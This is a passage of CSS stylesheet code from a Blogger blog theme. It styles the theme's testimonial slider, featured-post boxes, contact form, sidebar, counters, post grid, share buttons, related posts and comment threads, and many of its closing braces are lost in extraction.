radius:50%;filter:alpha(opacity=80);opacity:.80;cursor:pointer; padding: 0;}.flickity-page-dots
.dot.is-selected{filter:alpha(opacity=100);opacity:1}

.main-gallery {

background: url(https://2.bp.blogspot.com/-C2ZNH3JwldA/Vupbf-
HopaI/AAAAAAAADXU/xq1cJrP0LJMEylkyCr76kPNm-bxo0-7og/s1600/city-1150026_960_720.jpg)
no-repeat center bottom;

background-attachment: fixed;

background-size: cover;

position:relative;
}

.main-gallery:before {

content: "";

position: absolute;

top: 0;

left: 0;

width: 100%;

height: 100%;

opacity: .8;

background: #000;

.gallery-cell {

width: 100%;

.testimonial {

text-align: center;

max-width: 850px;

margin: 100px auto 130px auto;

padding: 0 20px;

.testimonial-avatar {

width: 100px;

border-radius: 50%;

.testimonial-quote {

display: block;

font-size: 24px;

padding: 10px 0;
line-height:1.4;

color:#fff;

font-style:italic;

font-weight:400;

.testimonial-author {

display: block;

font-weight: 700;

color: $maincolor;

.flickity-page-dots {

bottom: 25px;

.flickity-page-dots .dot.is-selected {

background: $maincolor;

/* ######## Section 3 Css ######################### */

/* ######## Featured Summary Css ######################### */

.tybox-wrapper {

margin: 0 0 10px;

overflow:hidden;

.featured-box {

clear: both;

.box-menu-tab {

position: relative;
clear: both;

width: 100%;

.tybox-wrapper .tyboxtabs .box-menu-tab li {

padding: 0;

list-style: none;

float: left;

.tybox-wrapper .tyboxtabs .box-menu-tab .box-head-title {

height: 30px;

line-height: 30px;

padding: 5px 10px;

font-size: 13px;

transition: color .3s ease-out;

background: #29333d;

float: left;

.tybox-wrapper .tyboxtabs .box-menu-tab .box-head-title a {

color: #fff;

text-transform: uppercase;

font-weight: 700;

.tybox-wrapper .tyboxtabs .box-menu-tab .active .box-head-title {

background: $maincolor;

.tybox-wrapper .tyboxtabs .box-menu-tab .box-head-more {

position: absolute;

right: 0;

height: 30px;

line-height: 30px;

padding: 5px 10px;


font-size: 13px;

transition: color .3s ease-out;

display:none;

.yard-auth-ty::before {

content: '\f007';

font-family: fontawesome;

color: #bbb;

margin-right: 5px;

.yard-auth-ty {

margin-right: 10px;

.yard-auth-ty, .ty-time {

color: #bdbdbd;

font-size: 12px;

font-weight: 400;

.tybox-wrapper .tyboxtabs .box-menu-tab .active .box-head-more {

display: inline-block;

.tybox-wrapper .tyboxtabs .box-menu-tab .box-head-more a:before {

display: inline-block;

margin-right: 5px;

width: 8px;

height: 8px;

border-radius: 50%;

background-color: $maincolor;

content: '';

vertical-align: baseline;

padding: 0;
}

.tybox .tybox-first {

width: 50%;

position: relative;

float: left;

padding-right: 1.4%;

box-sizing: border-box;

overflow: hidden;

.tybox .tybox-feat-image {

width: 100%;

position: relative;

overflow: hidden;

padding:10px;

box-sizing:border-box;

background:$maincolor;

.tybox .tybox-first .tyard-thumb, .tybox .tybox-img {

height: 250px !important;

transition: all .3s ease-in-out;

.templatesyard .tyard-thumb:hover .tybox-img, .templatesyard .tyard-thumb:hover .yard-img,


.templatesyard .tylist-first .tyard-thumb:hover .tylist-img, .templatesyard .col-left-first .tyard-
thumb:hover .col-left-img, .templatesyard .col-right-first .tyard-thumb:hover .col-right-img,
.templatesyard .ty-feat .tygrid-rest .tygrid-thumb:hover .yard-img, .post-home-image .post-
thumb:hover a {

transform: scale(1.1) rotate(-1deg);

transition: all .3s ease-in-out;

.templatesyard .tyard-thumb .tybox-img, .templatesyard .tyard-thumb .yard-img, .templatesyard


.tylist-first .tyard-thumb .tylist-img, .templatesyard .col-left-first .tyard-thumb .col-left-img,
.templatesyard .col-right-first .tyard-thumb .col-right-img, .templatesyard .ty-feat .tygrid-rest .tygrid-
thumb .yard-img, .post-home-image .post-thumb a {
transition: all .3s ease-in-out;

.templatesyard .tybox-first .tyard-thumb {

position: relative;

width: 100%;

height: 250px;

.templatesyard .tybox-img {

width: 100%;

height: 200px;

position: relative;

display: block;

.tybox-first .tyard-thumb .yard-label {

.tybox-first .tyard-thumb .yard-label a {

background: $maincolor;

color: #fff;

text-transform: uppercase;

height: 20px;

line-height: 20px;

display: inline-block;

padding: 0 6px;

font-size: 11px;

font-weight: 400;

border-radius: 2px;

.tybox .tybox-con-yard {

position: absolute;

bottom: 0;
width: 100%;

z-index: 2;

padding: 15px;

box-sizing: border-box;

.tybox .tybox-first .tybox-con-yard .tyard-title a {

display: block;

font-size: 19px;

color: #fff;

font-weight: 400;

line-height: 1.4em;

margin-bottom: 5px;

margin-top: 5px;

.tybox .tybox-first .recent-summary {

color: #fff;

font-size: 14px;

font-weight: normal;

.tybox-more {

background: #3d3d3d;

padding: 5px 12px !important;

display: inline-block;

vertical-align: middle;

margin: 0;

font-size: 12px;

text-transform: capitalize;

border-radius: 2px;

color: #f7f7f7;

font-weight: 700;

white-space: nowrap;
font-family:Ruda;

.tybox .ty-feat .tybox-rest.first-box {

width: 60%;

position: relative;

float: left;

overflow: hidden;

margin: 0;

padding-right: 2%;

box-sizing: border-box;

.tybox .ty-feat .tybox-rest.first-box .first-box-wrp {

overflow: hidden;

position: relative;

.tybox .ty-feat .tybox-rest {

margin-bottom: 10px;

overflow: hidden;

display: block;

padding: 0;

position: relative;

.templatesyard .ty-feat .tybox-rest .tyard-thumb {

position: relative;

float: left;

width: 100%;

height: auto;

overflow: hidden;

display: block;

vertical-align: middle;

margin: 0 !important;
}

.templatesyard .ty-feat .tybox-rest.first-box .yard-img {

height:430px;

.templatesyard .ty-feat .tybox-rest .yard-img {

width: 100%;

height: 210px;

position: relative;

display: block;

transition: all .3s ease-in-out;

.templatesyard .ty-feat .tybox-rest.first-box .tyard-thumb:before {

content: "\f0f6";

font-family: FontAwesome;

line-height: 25px;

width: 25px;

height: 25px;

font-size: 12px;

color: #fff;

text-align: center;

background-color: RGBA(0,0,0,0.4);

font-weight: 400;

position: absolute;

top: 8px;

opacity: 0.5;

right: 7px;

z-index: 2;

padding: 0;

border: 2px solid #fff;

border-radius: 50%;

-webkit-transition: all 500ms cubic-bezier(0.68, -0.55, 0.265, 1.55);


transition: all 500ms cubic-bezier(0.68, -0.55, 0.265, 1.55);

.templatesyard .ty-feat .tybox-rest .tyard-thumb:hover:before {

background-color: $maincolor;

border-color:$maincolor;

-webkit-box-shadow: 0 3px 5px rgba(0, 0, 0, 0.25);

-moz-box-shadow: 0 3px 5px rgba(0, 0, 0, 0.25);

box-shadow: 0 3px 5px rgba(0, 0, 0, 0.25);

opacity:1;

top: 40%;

right: 40%;

width: 50px;

height: 50px;

line-height: 50px;

font-size: 24px;

.tybox .tyimg-lay {

position: absolute;

left: 0;

top:50%;

bottom: 0;

z-index: 1;

width: 100%;

height: 50%;

opacity:0.5;

background: -moz-linear-gradient(top,rgba(34,34,34,0) 0%,rgba(34,34,34,.25)


30%,rgba(34,34,34,.8) 100%);

background: -webkit-gradient(linear,left top,left bottom,color-stop(0%,rgba(34,34,34,0)),color-


stop(30%,rgba(34,34,34,.25)),color-stop(100%,rgba(34,34,34,.8)));

background: -webkit-linear-gradient(top,rgba(34,34,34,0) 0%,rgba(34,34,34,.25)


30%,rgba(34,34,34,.8) 100%);
background: -o-linear-gradient(top,rgba(34,34,34,0) 0%,rgba(34,34,34,.25) 30%,rgba(34,34,34,.8)
100%);

background: -ms-linear-gradient(top,rgba(34,34,34,0) 0%,rgba(34,34,34,.25)


30%,rgba(34,34,34,.8) 100%);

background: linear-gradient(to bottom,rgba(34,34,34,0) 0%,rgba(34,34,34,.25)


30%,rgba(34,34,34,.8) 100%);

.tybox .yard-tent-ty {

position: absolute;

bottom: 0;

width: 100%;

z-index: 2;

padding: 15px;

box-sizing: border-box;

background: #282828;

.tybox .yard-tent-ty .yard-label {

z-index: 2;

.tybox .yard-tent-ty .yard-label {

color: #fff;

text-transform: uppercase;

height: 20px;

line-height: 20px;

display: inline-block;

padding:0;

font-size: 11px;

font-weight: 400;

margin-bottom: 8px;

.tybox .yard-tent-ty .yard-label a {


color:#fff;

.tybox .yard-tent-ty .yard-label a:before {

display: inline-block;

margin-right: 5px;

width: 8px;

height: 8px;

border-radius: 50%;

background-color: #ff4545;

content: '';

vertical-align: baseline;

padding: 0;

.tybox .yard-tent-ty .tyard-title {

overflow: hidden;

line-height: 0;

margin: 0 0 2px;

padding: 0;

.tybox .ty-feat .tybox-rest.first-box .yard-tent-ty .tyard-title a {

font-size: 22px;

line-height: 1.2;

.tybox .yard-tent-ty .tyard-title a {

color: #fff;

font-weight: 700;

font-size: 16px;

line-height: 1.5em;

letter-spacing: 1px;
}

.tybox-time {

color: #bdbdbd;

font-size: 12px;

font-weight: 400;

.tybox-time:before {

content: '\f133';

font-family: fontawesome;

color: #bbb;

margin-right: 5px;

.tybox .ty-feat .tybox-rest:nth-child(3) {

margin-bottom: 0;

.tybox .tyard-thumb .item-cmm {

position: absolute;

top: 0;

left: 10px;

z-index: 2;

color: #fff;

text-transform: uppercase;

height: 20px;

line-height: 20px;

display: inline-block;

padding: 5px 6px 0;

font-size: 12px;

font-weight: bold;

background: $maincolor;

border-radius: 0 0 2px 2px;


}

.tybox .tyard-thumb .item-cmm:before {

content: "\f086";

margin-right: 5px;

font-family: FontAwesome;

font-style: normal;

font-weight: normal;

-webkit-font-smoothing: antialiased;

-moz-osx-font-smoothing: grayscale;

.tybox .category-gallery {

position: absolute;

top: 10px;

right: 10px;

z-index: 3;

overflow: hidden;

.tybox .category-gallery a:before {

display: block;

background-color: #e74c3c;

opacity: .5;

color: #fff;

height: 18px;

line-height: 18px;

padding: 0 5px;

font-size: 10px;

font-weight: 400;

text-transform: uppercase;

border-radius: 2px;

transition: all .3s ease;

}
.icon:before {

font-family: FontAwesome;

font-weight: 400;

font-style: normal;

line-height: 1;

padding-right: 4px;

.tysum-wrapper .featured-box {

margin: 0 auto;

overflow: hidden;

.tyheading-head {

text-align: center;

margin: 25px 0;

.tyheading-head h2 {

font-size: 35px;

line-height: 45px;

color: #303030;

text-transform: capitalize;

.tysum .ty-feat .tybox-rest {

float: left;

width: 25%;

padding-right: 10px;

box-sizing: border-box;

margin-bottom:10px;

position:relative;

.tysum .ty-feat .tybox-rest:nth-child(4n) {

padding-right: 0;
}

.tysum .tyimg-lay {

position: absolute;

left: 0;

top: 0;

z-index: 1;

width: 100%;

height: 100%;

opacity:0.5;

background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0.3) 50%, rgba(0, 0, 0, 0.6) 70%, rgba(0, 0, 0,


1) 100%);

background: -moz-linear-gradient(top, rgba(0, 0, 0, 0.3) 50%, rgba(0, 0, 0, 0.6) 70%, rgba(0, 0, 0, 1)


100%);

background: -ms-linear-gradient(top, rgba(0, 0, 0, 0.3) 50%, rgba(0, 0, 0, 0.6) 70%, rgba(0, 0, 0, 1)


100%);

background: -o-linear-gradient(top, rgba(0, 0, 0, 0.3) 50%, rgba(0, 0, 0, 0.6) 70%, rgba(0, 0, 0, 1)


100%);

background: linear-gradient(top, rgba(0, 0, 0, 0.3) 50%, rgba(0, 0, 0, 0.6) 70%, rgba(0, 0, 0, 1)


100%);

.tysum .yard-tent-ty {

clear: both;

z-index: 2;

padding: 10px 0 0;

box-sizing: border-box;

.tysum .yard-tent-ty .tyard-title {

overflow: hidden;

line-height: 0;

margin: 0 0 2px;

padding: 0;
}

.tysum .yard-tent-ty .tyard-title a {

color: #2e2e2e;

font-weight: 700;

font-size: 16px;

line-height: 1.5em;

letter-spacing: 1px;

.tysum .yard-tent-ty .recent-summary {

color: #6a6a6a;

line-height: 20px;

font-size: 13px;

font-weight: normal;

.tysum.templatesyard .ty-feat .tybox-rest .yard-img {

height: 185px;

.tysum-wrapper {

overflow: hidden;

background: #fff;

padding: 0 0 25px;

/* ######## Contact Form Css ######################### */

div#sora_blogger_cntct_form {

padding: 50px 0px;

border-radius: 2px;

color: #1D1D1D;

font-size: 15px;

font-weight: bold;

position: relative;

margin:0 auto;
overflow:hidden;}

#sora_blogger_cntct_form-wrap{

background: url(http://4.bp.blogspot.com/-
TVL5kqig2ro/W4aj1JkfXyI/AAAAAAAAFiU/LVK_laGaCUE2j06-
gcaGkQV9ulQ2w6SOQCK4BGAYYCw/s1600/nature-3616194_1920.jpg) no-repeat center bottom;

background-attachment: fixed;

background-size: cover;

position:relative;

#sora_blogger_cntct_form-wrap:before {

content: "";

position: absolute;

top: 0;

left: 0;

width: 100%;

height: 100%;

opacity: .8;

background: #000;

div#sora_blogger_cntct_form .wrap-me {

margin: 0 auto;

display: block;

max-width: 800px;

width: 100%;

box-sizing: border-box;

padding: 40px 40px 5px;

.contact-title {

text-align: center;

margin: 25px 0;

}
.contact-title h4 {

font-size: 35px;

line-height: 45px;

color: #303030;

.contact-title span {

color: #606060;

.contact_list_wrapper {

text-align: center;

.contact-list-info {

list-style: none;

padding: 0;

margin: 0;

text-align: center;

.contact_list_wrapper .contact-list-info li {

padding: 0;

padding-left: 15px;

padding-right: 15px;

display: inline-block;

line-height: 25px;

color: #606060;

.contact_list_wrapper .contact-list-info li i {

display: inline;

margin-right: 5px;

font-size: 15px;

vertical-align: -2px;

color: #303030;
}

.contact_list_wrapper .contact-list-info li p {

display: inline;

input#ContactForm1_contact-form-name, #ContactForm1_contact-form-email,
#ContactForm1_contact-form-email:hover, #ContactForm1_contact-form-email:active {

padding: 5px;

margin-top: 4px !important;

box-shadow: none!Important;

width: 100%;

max-width: 100%;

background: #fafafa !important;

color: #333!important;

border-color: #f0f0f0 !important;

border-width:0 0 1px 0;

line-height: 1em;

min-height: 45px;

margin-bottom: 15px;

border-radius: 0px;

.contact-form-email-message, .contact-form-email-message:active, .contact-form-email-


message:hover {

padding: 5px;

margin-top: 4px !important;

box-shadow: none!Important;

width: 100%;

max-width: 100%;

line-height: 1em;

min-height: 80px;

background: #fafafa !important;

color: #333;

border-color: #f0f0f0 !important;


border-width:0 0 1px 0;

margin-bottom: 10px;

border-radius: 0px;

/***** Focus *****/

#ContactForm1_contact-form-name:focus, #ContactForm1_contact-form-email:focus,
#ContactForm1_contact-form-email-message:focus {

outline: none;

background: transparent !important;

color: #333;

border-color: $maincolor !important;

border-width:0 0 1px 0;

box-shadow: none !important;

transition: all 0.3s ease-in-out !important;

/**** Submit button style ****/

.contact-form-button-submit:hover {

color: #FFFFFF;

background: $maincolor !important;

color:#000!important;

.contact-form-button-submit {

background: #111;

-webkit-box-shadow: 0px 10px 30px rgba(0, 0, 0, 0.2);

box-shadow: 0px 10px 30px rgba(0, 0, 0, 0.2);

display: table;

font-size: 17px;

margin: 0 !important;

border-radius: 5px !important;

max-width: inherit;

width: inherit;
min-width: inherit;

line-height: 0px;

font-weight: normal;

position: relative;

cursor: pointer;

outline: none!important;

color: #fff;

border: 1px solid #111 !important;

text-align: center;

padding: 25px 50px;

text-transform: capitalize;

display: inline-block;

transition: all 300ms ease-in-out;

-webkit-transition: all 300ms ease-in-out;

-moz-transition: all 300ms ease-in-out;

/**** Submit button on Focus ****/

.contact-form-button-submit:focus, .contact-form-button-submit.focus {

border-color: $maincolor;

box-shadow: none !important;

color:#000!important;

/**** Error message ****/

.contact-form-success-message, .contact-form-success-message-with-border {

color: #fff !important;

margin-top:55px !important;

/**** Submit Button On Success Message ****/

.contact-form-button-submit.disabled, .contact-form-button-submit.disabled:hover, .contact-form-


button-submit.disabled:active {
opacity: 0.9;

/****** Success Message *****/

.contact-form-error-message-with-border {

background: #000000;

border: 1px solid #5A5A5A;

bottom: 0;

box-shadow: none;

color: #FDFDFD;

font-size: 15px;

font-weight: normal;

line-height: 35px;

margin-left: 0;

opacity: 1;

position: static;

text-align: center;

height: 35px;

margin-top: 60px;

.contact-form-cross {

height: 14px;

margin: 5px;

vertical-align: -8.5%;

float: right;

width: 14px;

border-radius: 50px;

border: 0 !important;

cursor: pointer;

.contact-form-widget {

max-width: 100%;
}

.contact-form-success-message-with-border {

font-weight: normal;

background-color: #000;

border: 1px solid #FFF;

color: #FFF;

line-height: 35px;

margin-left: 0;

font-size: 13px;

opacity: 1;

position: static;

text-align: center;

height: 35px;

margin-top: 60px;

/* Extra Stuff */

div#sora_blogger_cntct_form span.name-bg, div#sora_blogger_cntct_form span.email-bg {

display: inline-block;

line-height: 21px;

width: 100%;

color: #000;

padding: 3px 0;

margin: 0px 0px 4px;

box-sizing: border-box;

height: 30px;

letter-spacing: 1px;

font-weight: normal;

div#sora_blogger_cntct_form span.message-bg {

display: inline-block;
line-height: 21px;

width: 100%;

color: #000;

padding: 3px 0;

box-sizing: border-box;

height: 30px;

margin: 0px 0px 4px;

letter-spacing: 1px;

font-weight: normal;

div#sora_blogger_cntct_form span.send-bg {

display: block;

text-align: center;

transition: all 0.4s ease-in-out !important;

margin-top: 15px;

div#sora_blogger_cntct_form span.clear-bg {

display: none;

input.contact-form-button.contact-form-button-submit.clear-button:hover {

background-color: #E83434 !important;

div#sora_blogger_cntct_form .clear-button {

display:none;

}
.map-me {

margin: 0;

display: block;

text-align:center;

width: 100%;

padding:0;

box-sizing: border-box;

overflow: hidden;

.map-me .con-title {

font-weight: 700;

line-height: 48px;

color: #000;

margin: 0;

text-transform: capitalize;

.map-me .con-text {

font-weight: 100;

line-height: 24px;

color: #555;

margin: 0 0 10px;

.map-me .con-list {

list-style-type: none;

padding: 0;

.map-me .con-list li {

list-style-type: none;

color: #fff;

line-height: 45px;

text-transform: capitalize;
font-weight:normal;

width: 33.33%;

float: left;

.map-me .con-list li i {

font-size: 30px;

margin-right: 20px;

padding: 15px;

-webkit-box-pack: center;

-ms-flex-pack: center;

justify-content: center;

color: #999;

width: 100%;

display: block;

box-sizing: border-box;

text-align: center;

.map-me .con-list li span {

clear: both;

display: block;

width: 100%;

text-align: center;

text-transform: none;

.map-me .con-list li .con-list-head {

font-weight:700;

/* ######## Sidebar Css ######################### */

.sidebar .widget {

margin-bottom: 20px;

position: relative;
background: #f5f5f5 none repeat scroll top left;

box-shadow: 0px 2px 6px 0px rgba(0,0,0,0.1);

.sidebar h2 {

font-size: 17px;

line-height: 27px;

color: #000;

padding: 7px 15px;

font-weight: 400;

letter-spacing: 1.5px;

text-transform: uppercase;

position: relative;

text-align: center;

background: #f7f7f7;

border: 1px solid #f0f0f0;

.sidebar .widget-content {

padding: 10px;

box-sizing:border-box;

.sidebar ul,.sidebar li{

list-style-type:none;

margin:0;

/* ######## Counter Css ######################### */

.counter-box {

background: url(http://4.bp.blogspot.com/-
Tev2WNGyFs8/WaUuh31ZVRI/AAAAAAAADuY/5D9_uZ3rgrY9cVKC46DXxPMlXlxCOmB4gCK4BGAYYC
w/s1600/sg-back.jpg) no-repeat;

background-attachment: scroll;

background-size: cover;

background-position: 50% 0;
overflow: hidden;

margin: 0 auto;

padding: 40px 0;

position:relative;

.counter-box:before {

background: rgba(0, 0, 0, 0.7);

content: "";

position: absolute;

display: block;

left: 0;

top: 0;

width: 100%;

height: 100%;

bottom: 0;

.counter-box-wrap {

margin: 0 auto;

.counter-box-item {

width: 25%;

float: left;

padding: 10px;

box-sizing: border-box;

text-align: center;

color: #fff;

position: relative;

.counter-box-item i {

font-size: 24px;

}
.counter-sora {

color:#fff;

font-size: 48px;

line-height: 48px;

font-weight: 700;

margin: 10px 0;

-webkit-transition: all 300ms linear;

-moz-transition: all 300ms linear;

-o-transition: all 300ms linear;

transition: all 300ms linear;

.counter-sora-text {

font-size: 14px;

text-transform: uppercase;

letter-spacing: 3px;

color: #fff;

/* ######## Post Css ######################### */

.Portfolio-title {

text-align: center;

margin: 25px 0;

.Portfolio-title h4 {

font-size: 35px;

line-height: 45px;

color: #303030;

text-transform:capitalize;

.Portfolio-title span {

color: #606060;
}

article {

padding: 0;

overflow:hidden;

.index .post-grid-item, .archive .post-grid-item {

width:33.33%;

float:left;

padding-right:15px;

box-sizing:border-box;

margin-bottom:15px;

.index .post-grid-item:nth-child(3n), .archive .post-grid-item:nth-child(3n) {

padding-right:0;

.post {

display: block;

word-wrap: break-word;

background: #ffffff;

.post h1 {

color: #0a0a0a;

font-size: 28px;

font-weight: 400;

line-height: 32px;

margin: 0 0 10px;

.post h2 {

margin-bottom: 12px;

line-height: 37px;
font-size: 18px;

font-weight:500;

text-transform:capitalize;

.post h2 a {

color: #000;

.post h2 {

margin: 0 0 10px;

padding: 0;

.retitle h2 {

margin: 8px 0;

display: block;

.post-body {

margin: 0px;

padding:10px;

font-size: 14px;

line-height: 26px;

box-sizing:border-box;

text-align:justify;

.block-image {

float: left;

width: 100%;

height:auto;

position:relative;
}

.block-image .thumb {

width: 100%;

height: auto;

position: relative;

display: block;

overflow: hidden;

.block-image .thumb:before {

background:rgba(255, 255, 255, 0.95);

bottom: 0px;

content: "";

height: 100%;

width: 100%;

left: 0px;

right: 0px;

margin: 0px auto;

position: absolute;

opacity:0;

-webkit-transform: translateX(-100%);

transform: translateX(-100%);

-webkit-transition: opacity .5s;

transition: opacity .5s;

z-index: 3;

.block-image img {

width: 100%;

height: 260px;

display: block;

object-fit:cover;

transition: all .3s ease-out!important;


-webkit-transition: all .3s ease-out!important;

-moz-transition: all .3s ease-out!important;

-o-transition: all .3s ease-out!important;

.block-image:hover .retitle {

opacity:1;

.block-image:hover .thumb:before {

opacity:1;

-webkit-transform: scale(1, 1);

transform: scale(1, 1);

opacity: 1;

-webkit-transition: opacity 0s, -webkit-transform 0.5s cubic-bezier(0.77, 0, 0.175, 1);

transition: opacity 0s, -webkit-transform 0.5s cubic-bezier(0.77, 0, 0.175, 1);

transition: transform 0.5s cubic-bezier(0.77, 0, 0.175, 1), opacity 0s;

transition: transform 0.5s cubic-bezier(0.77, 0, 0.175, 1), opacity 0s, -webkit-transform 0.5s cubic-
bezier(0.77, 0, 0.175, 1);

.block-image .retitle {

position: absolute;

top: 0;

text-align: center;

display: table;

width: 100%;

height: 260px;

box-sizing: border-box;

opacity: 0;

z-index: 9;

transition: all .3s ease-out!important;

-webkit-transition: all .3s ease-out!important;

-moz-transition: all .3s ease-out!important;


-o-transition: all .3s ease-out!important;

.block-image .post-retitle {

display: table-cell;

vertical-align: middle;

.block-image .post-retitle h2{

position: relative;

width: 80%;

margin: 0 auto;

padding: 20px 10px;

.post-header {

padding: 0 10px 10px;

.post-meta {

color: #bdbdbd;

display: block;

font-size: 13px;

font-weight: 400;

line-height: 21px;

margin: 0;

padding: 0;

.post-meta a, .post-meta i {

color: #CBCBCB;

.post-timestamp {

margin-left: 5px;

.label-head {
margin-left: 5px;

.label-head a {

padding-left: 2px;

.resumo {

margin-top: 10px;

color: #919191;

.resumo span {

display: block;

margin-bottom: 8px;

font-size: 16px;

line-height: 31px;

.post-body img {

max-width: 100%;

padding: 10px 0;

position: relative;

margin:0 auto;

.post h3 {

font-size: 18px;

margin-top: 20px;

margin-bottom: 10px;

line-height: 1.1;

.second-meta {

display: none;

.comment-link {
white-space: normal;

.ias_trigger {

clear: both;

text-align: center;

.ias_trigger a {

padding: 8px;

color: #fff;

background: #222;

border-radius: 4px;

.ias_trigger a:hover {

background:$maincolor;

#blog-pager {

clear: both;

text-align: center;

padding: 15px 0;

background: #ffffff;

color: #4d4d4d;

.displaypageNum a,

.showpage a,

.pagecurrent, .blog-pager-older-link, .blog-pager-newer-link {

padding: 5px 13px;

margin-right: 8px;

color: #fff;

background-color: #2b2b2b;

display: inline-block;

line-height: 20px;
-moz-border-radius: 2px;

-webkit-border-radius: 2px;

border-radius: 2px;

margin-top: 10px;

.displaypageNum a:hover,

.showpage a:hover,

.pagecurrent, .blog-pager-older-link:hover, .blog-pager-newer-link:hover {

background: $maincolor;

text-decoration: none;

color: #fff;

.showpageOf {

display: none!important;

overflow: hidden;

#blog-pager .pages {

margin: 10px 0;

border: none;

/* ######## Share widget Css ######################### */

.item .post-footer {

padding: 0 10px;

.share-box {

position: relative;

padding: 10px 0;

.share-title {

border-bottom: 2px solid #777;

color: #010101;
display: inline-block;

padding-bottom: 7px;

font-size: 15px;

font-weight: 500;

position: relative;

top: 2px;

.share-art {

float: right;

padding: 0;

padding-top: 0;

font-size: 13px;

font-weight: 400;

text-transform: capitalize;

.share-art a {

color: #fff;

padding: 3px 8px;

margin-left: 4px;

border-radius: 2px;

display: inline-block;

margin-right: 0;

background: #010101;

.share-art a span {

display: none;

.share-art a:hover{color:#fff}

.share-art .fac-art{background:#3b5998}

.share-art .fac-art:hover{background:rgba(49,77,145,0.7)}

.share-art .twi-art{background:#00acee}
.share-art .twi-art:hover{background:rgba(7,190,237,0.7)}

.share-art .goo-art{background:#db4a39}

.share-art .goo-art:hover{background:rgba(221,75,56,0.7)}

.share-art .pin-art{background:#CA2127}

.share-art .pin-art:hover{background:rgba(202,33,39,0.7)}

.share-art .lin-art{background:#0077B5}

.share-art .lin-art:hover{background:rgba(0,119,181,0.7)}

.share-art .wat-art{background:#25d266;display:none;}

.share-art .wat-art:hover{background:rgba(37, 210, 102, 0.73)}

@media only screen and (max-width: 768px) {

.share-art .wat-art{display:inline-block;}

/* ######## Related Post Css ######################### */

#related-posts {

margin-bottom: 10px;

padding: 10px 0;

.related li {

width: 32%;

display: inline-block;

height: auto;

min-height: 184px;

float: left;

margin-right: 10px;

overflow: hidden;

position: relative;

.related li h3 {

margin-top:0;

.related-thumb {
width: 100%;

height: 100px;

overflow: hidden;

border-radius: 2px;

.related li .related-img {

width: 100%;

height: 100px;

display: block;

position: relative;

transition: all .3s ease-out!important;

-webkit-transition: all .3s ease-out!important;

-moz-transition: all .3s ease-out!important;

-o-transition: all .3s ease-out!important;

.related li .related-img:hover {

-webkit-transform: scale(1.1) rotate(-1.5deg)!important;

-moz-transform: scale(1.1) rotate(-1.5deg)!important;

transform: scale(1.1) rotate(-1.5deg)!important;

transition: all .3s ease-out!important;

-webkit-transition: all .3s ease-out!important;

-moz-transition: all .3s ease-out!important;

-o-transition: all .3s ease-out!important;

.related-title a {

font-size: 12px;

line-height: 1.4em;

padding: 10px 0 0;

font-weight: 400;

font-style: normal;

letter-spacing: 1px;
color: #010101;

display: block;

.related li:nth-of-type(3n) {

margin-right: 0;

.related .related-tag {

display:none;

.related-overlay {

position: absolute;

left: 0;

top: 0;

z-index: 1;

width: 100%;

height: 100%;

background-color: rgba(40,35,40,0.05);

.related-content {

display: block;

bottom: 0;

padding: 0px 0px 11px;

width: 100%;

line-height: 1.2em;

box-sizing: border-box;

z-index: 2;

.related .related-content .recent-date {

font-size: 10px;

.recent-date:before, .p-date:before {
content: '\f017';

font-family: fontawesome;

margin-right: 5px;

/* ######## Comment Widget Css ######################### */

.comments {

clear: both;

margin: 0;

color: #48494d;

margin-top:10px;

box-sizing: border-box;

border-radius: 5px;

padding: 30px 30px 20px;

background: #FFF;

.post-feeds .feed-links {

display: none;

iframe.blogger-iframe-colorize,

iframe.blogger-comment-from-post {

height: 260px!important;

background: #fff;

.comment-form {

overflow:hidden;

.comments h3 {

line-height:normal;

text-transform:uppercase;

color:#333;

font-weight:bold;
margin:0 0 20px 0;

font-size:14px;

padding:0 0 0 0;

h4#comment-post-message {

display:none;

margin:0 0 0 0;

.comments h4{

color: #48494d;

border-bottom: 1px solid #efefef;

font-size: 16px;

padding: 12px 0;

margin: 0;

font-weight: 700;

letter-spacing: 1.5px;

text-transform: uppercase;

position: relative;

text-align: left;

.comments h4:after {

display: inline-block;

content: "\f075";

font-family: fontAwesome;

font-style: normal;

font-weight: normal;

font-size: 18px;

color: $maincolor;

top: 12px;

right: 15px;

padding: 0;
position: absolute;

.comments .comments-content{

font-size:13px;

margin-bottom:8px;

padding: 0;

.comments .comments-content .comment-thread ol{

list-style:none;

text-align:left;

margin:13px 0;

padding:0

.comments .comments-content .comment-thread ol li{

list-style:none;

.comments .avatar-image-container {

background:#fff;

border:1px solid #DDD;

overflow:hidden;

padding:0;

border-radius: 50%;

.comments .avatar-image-container img {

border-radius:50%;

.comments .comment-block{

position:relative;

background:#fff;

padding:15px;

margin-left:60px;
border: 1px solid #efefef;

.comments .comment-block:before {

content:"";

width:0px;

height:0px;

position:absolute;

right:100%;

top:14px;

border-width:10px;

border-style:solid;

border-color:transparent #DDD transparent transparent;

display:block;

.comments .comments-content .comment-replies{

margin:8px 0;

margin-left:60px

.comments .comments-content .comment-thread:empty{

display:none

.comments .comment-replybox-single {

background:#f0f0f0;

padding:0;

margin:8px 0;

margin-left:60px

.comments .comment-replybox-thread {

background:#f0f0f0;

margin:8px 0 0 0;

padding:0;
}

.comments .comments-content .comment{

margin-bottom:6px;

padding:0

.comments .comments-content .comment:first-child {

padding:0;

margin:0

.comments .comments-content .comment:last-child {

padding:0;

margin:0

.comments .comment-thread.inline-thread .comment, .comments .comment-thread.inline-thread


.comment:last-child {

margin:0px 0px 5px 30%

.comment .comment-thread.inline-thread .comment:nth-child(6) {

margin:0px 0px 5px 25%;

.comment .comment-thread.inline-thread .comment:nth-child(5) {

margin:0px 0px 5px 20%;

.comment .comment-thread.inline-thread .comment:nth-child(4) {

margin:0px 0px 5px 15%;

.comment .comment-thread.inline-thread .comment:nth-child(3) {

margin:0px 0px 5px 10%;

.comment .comment-thread.inline-thread .comment:nth-child(2) {

margin:0px 0px 5px 5%;


}

.comment .comment-thread.inline-thread .comment:nth-child(1) {

margin:0px 0px 5px 0;

.comments .comments-content .comment-thread{

margin:0;

padding:0

.comments .comments-content .inline-thread{

background: #fff;

padding:15px;

box-sizing:border-box;

margin:0

.comments .comments-content .inline-thread .comment-block {

border-color: $maincolor;

.comments .comments-content .inline-thread .comment-block:before {

border-color: transparent $maincolor transparent transparent;

.comments .comments-content .user {

letter-spacing: 0.5px;

font-weight: 600;

.comments .comments-content .icon.blog-author {

display:inline;

.comments .comments-content .icon.blog-author:after {

content: "Author";

background:$maincolor;

color: #fff;
font-size: 11px;

padding: 2px 5px;

text-transform:Capitalize;

font-style:italic;

letter-spacing: 0.3px;

.comment-header {

text-transform:uppercase;

font-size:12px;

.comments .comments-content .datetime {

margin-left: 6px;
